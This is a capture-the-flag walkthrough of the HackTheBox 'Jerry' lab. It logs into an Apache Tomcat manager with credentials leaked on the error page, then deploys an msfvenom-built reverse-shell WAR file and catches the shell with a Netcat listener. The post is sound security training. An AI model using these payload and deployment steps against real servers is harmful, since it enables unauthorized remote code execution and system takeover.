In this post, we covered HackTheBox Jerry as part of the beginner track in Hackthebox. We demonstrated the move from Apache Tomcat into complete shell access.
Machine Difficulty: Easy
Demonstrated Concept: Apache Tomcat Exploitation By Exploiting Weak Manager Credentials.
The Apache Tomcat® software is an open source implementation of the Jakarta Servlet, Jakarta Server Pages, Jakarta Expression Language, Jakarta WebSocket, Jakarta Annotations and Jakarta Authentication specifications. These specifications are part of the Jakarta EE platform.
Initial Steps & Enumeration
First, I made sure the machine was up and running and that I had its IP address. Then, I ran an Nmap scan. This scan was quite revealing, showing only one open port: 8080. This port was running Apache Tomcat with Coyote JSP engine 1.1, and the operating system was identified as Microsoft Windows Server 2012. Since only port 8080 was open, I immediately decided to check out what was running on it by navigating to the machine’s IP address on that port in Firefox.
Exploiting Tomcat
I know that Tomcat installations can often be compromised by accessing their manager application. So, I tried to access the /manager/html path. This brought up a login prompt. I initially thought about trying common default credentials like tomcat/tomcat, but they didn’t work.
Interestingly, when I clicked “Cancel” on the login prompt, the “Unauthorized” page displayed a very helpful disclosure: username=tomcat and password=s3cret. This was an unexpected but welcome find! I then used these credentials (tomcat/s3cret) to successfully log into the Tomcat manager application.
Gaining a Shell
Once I was inside the Tomcat application manager, my plan was to upload a WAR (Web Application Archive) file that contained a reverse shell payload. I used msfvenom to create this Java payload. Here’s the command I used:
Bash
sudo msfvenom -p java/shell_reverse_tcp LHOST=<my_ip_address> LPORT=4545 -f war -o shell.war
I made sure to replace <my_ip_address> with my actual IP address (which I got using ifconfig). The payload type was java/shell_reverse_tcp, and I set the listening port on my machine to 4545. The output file was named shell.war.
While the payload was generating, I set up a listener on my machine using Netcat:
Bash
nc -lvp 4545
After the shell.war file was created, I went to the “WAR file to deploy” section in the Tomcat manager, browsed for shell.war, and deployed it. As soon as it was deployed, I clicked on the newly deployed “shell” application in the manager. This action triggered the reverse shell, and I immediately received a connection on my Netcat listener!
Post-Exploitation & Flag Retrieval
With the shell in hand, I first checked my user privileges:
Bash
whoami
The output was nt authority\system, which meant I had the highest level of privileges on the Windows system. This was great because it meant no further privilege escalation was needed!
My next step was to find the flags. I navigated to the C:\Users\Administrator\Desktop\flags directory. Inside this directory, there were two files. I initially tried cat to read them, but then remembered that on Windows, the correct command is type. The files had spaces in their names, like “2 for the price of 1.txt”, so I had to use quotation marks around the filename:
Bash
type "2 for the price of 1.txt"
This command revealed both the user flag and the root flag! I then submitted these flags on the Hack The Box platform.
I rated this machine as very easy, a “piece of cake,” and mentioned that the overall goal is to complete the entire track for users of all skill levels.
